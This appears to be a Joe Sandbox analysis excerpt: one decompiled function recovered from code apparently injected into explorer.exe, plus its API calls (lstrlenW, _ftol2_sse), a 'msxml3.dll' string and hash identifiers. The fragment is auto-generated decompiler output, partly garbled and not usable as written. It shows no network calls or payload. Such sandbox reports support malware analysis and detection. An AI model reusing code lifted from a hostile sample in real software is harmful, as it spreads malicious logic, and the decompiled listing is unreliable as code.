                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E02F93674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                              				char _v5;
                                                                                                                                                                                              				long long _v12;
                                                                                                                                                                                              				short _v20;
                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                              				char _t25;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				char** _t32;
                                                                                                                                                                                              				long long _t40;
                                                                                                                                                                                              				long long _t41;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t40 = __fp0;
                                                                                                                                                                                              				_t15 = E02F9358D(_a4);
                                                                                                                                                                                              				 *_t32 = "msxml3.dll";
                                                                                                                                                                                              				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                                              				_t16 = E02F8A43D();
                                                                                                                                                                                              				_t26 = 0xf;
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v5 = 0;
                                                                                                                                                                                              				if(_t16 > _t26) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                                              					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                                              					_t25 = _t25 + 1;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t26 = _t16;
                                                                                                                                                                                              					if(_t26 != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							goto L2;
                                                                                                                                                                                              						} while (_t25 < _t26);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				lstrlenW( &_v20);
                                                                                                                                                                                              				_t29 = _a8;
                                                                                                                                                                                              				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                                              				_a12 = _t22;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t22 < 0) {
                                                                                                                                                                                              					_t40 = _t40 +  *0x2f9cf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_a12 = _t28;
                                                                                                                                                                                              				_v12 = _t40;
                                                                                                                                                                                              				_t41 = _v12;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t28 < 0) {
                                                                                                                                                                                              					_t41 = _t41 +  *0x2f9cf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = _t41;
                                                                                                                                                                                              				asm("fmulp st1, st0");
                                                                                                                                                                                              				L02F98935();
                                                                                                                                                                                              				return _t29 - _t22;
                                                                                                                                                                                              			}


















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 02F936BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 02F936FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: 9ea78d6faed0c6cb9483393718655d9325f2c7b48f4fcbf82b3434b0066614c1
                                                                                                                                                                                              • Instruction ID: 7bba58303ef6e20d1f1b7fd08fe7c244ed417d8a6d269f5fc83734d22a831ac0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ea78d6faed0c6cb9483393718655d9325f2c7b48f4fcbf82b3434b0066614c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF112532E0028D9BDF009F69E80459EBFB5FF94390B2249A9DA1192281EB31C1648B81
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%